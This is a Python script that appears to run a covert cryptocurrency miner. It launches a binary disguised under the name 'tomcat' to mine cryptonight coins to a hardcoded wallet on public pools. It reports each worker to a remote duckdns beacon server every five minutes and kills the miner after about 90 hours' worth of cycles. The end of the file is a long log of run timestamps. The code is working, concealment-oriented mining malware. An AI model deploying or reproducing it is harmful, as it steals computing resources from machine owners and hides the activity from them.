import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:06.197903
#2018-02-17 15:55:01.495444
#2018-02-17 17:42:07.850322
#2018-02-17 19:29:01.573050
#2018-02-17 21:18:03.778993
#2018-02-17 23:02:01.784878
#2018-02-18 00:49:06.181084
#2018-02-18 02:35:06.438564
#2018-02-18 04:22:04.922197
#2018-02-18 06:12:01.304842
#2018-02-18 08:02:05.288982
#2018-02-18 09:50:07.131773
#2018-02-18 11:37:01.496047
#2018-02-18 13:22:05.701172
#2018-02-18 15:12:06.791438
#2018-02-18 17:01:06.982701
#2018-02-18 18:47:05.809612
#2018-02-18 20:34:04.844675
#2018-02-18 22:20:07.072601
#2018-02-19 00:10:04.411304
#2018-02-19 01:56:06.911406
#2018-02-19 03:43:07.380964
#2018-02-19 05:28:04.549131
#2018-02-19 07:15:01.987722
#2018-02-19 09:03:06.878029
#2018-02-19 10:53:04.839526
#2018-02-19 12:41:01.587449
#2018-02-19 14:29:08.480475
#2018-02-19 16:18:01.366080
#2018-02-19 18:05:05.758274
#2018-02-19 19:51:05.695673
#2018-02-19 21:38:07.644622
#2018-02-19 23:24:05.555903
#2018-02-20 01:10:07.525500
#2018-02-20 03:01:07.496742
#2018-02-20 04:49:01.524615
#2018-02-20 06:33:04.020314
#2018-02-20 08:18:07.597011
#2018-02-20 10:03:06.412741
#2018-02-20 11:47:10.180024
#2018-02-20 13:36:11.260817
#2018-02-20 15:21:07.420402
#2018-02-20 17:06:05.806926
#2018-02-20 18:54:01.654734
#2018-02-20 20:45:09.776793
#2018-02-20 22:31:03.960358
#2018-02-21 00:12:04.930165
#2018-02-21 01:57:01.383496
#2018-02-21 03:45:04.668512
#2018-02-21 05:37:06.492398
#2018-02-21 07:25:02.689116
#2018-02-21 09:10:01.421735
#2018-02-21 10:59:07.609915
#2018-02-21 12:44:04.725195
#2018-02-21 14:34:06.758676
#2018-02-21 16:20:13.087706
#2018-02-21 18:11:04.753998
#2018-02-21 19:57:01.367769
#2018-02-21 21:44:06.047678
#2018-02-21 23:32:08.634630
#2018-02-22 01:22:06.801482
#2018-02-22 03:12:03.964848
#2018-02-22 04:58:07.190656
#2018-02-22 06:43:06.045961
#2018-02-22 08:32:08.339456
#2018-02-22 10:18:07.686856
#2018-02-22 12:04:01.838171
#2018-02-22 13:50:12.596730
#2018-02-22 15:38:04.407366
#2018-02-22 17:25:11.322797
#2018-02-22 19:13:09.188631
#2018-02-22 21:05:09.594948
#2018-02-22 22:49:05.461583
#2018-02-23 00:36:01.860733
#2018-02-23 02:21:04.464439
#2018-02-23 04:09:06.466675
#2018-02-23 05:55:05.284325
#2018-02-23 07:37:05.656842
#2018-02-23 09:40:04.292779
#2018-02-23 11:44:06.260705
#2018-02-23 13:34:06.036223
#2018-02-23 15:22:07.388894
#2018-02-23 17:09:01.946302
#2018-02-23 18:54:08.974903
#2018-02-23 20:42:04.207533
#2018-02-23 22:28:03.652443
#2018-02-24 00:14:04.793678
#2018-02-24 02:06:05.831904
#2018-02-24 03:56:05.202551
#2018-02-24 06:41:01.566748
#2018-02-24 08:30:08.392632
#2018-02-24 10:17:07.711577
#2018-02-24 12:13:03.957285
#2018-02-24 13:59:03.549266
#2018-02-24 15:51:06.858957
#2018-02-24 17:46:06.288256
#2018-02-24 19:35:03.145238
#2018-02-24 21:22:06.349227
#2018-02-25 00:02:07.669167
#2018-02-25 04:01:05.171981
#2018-02-25 07:34:04.454122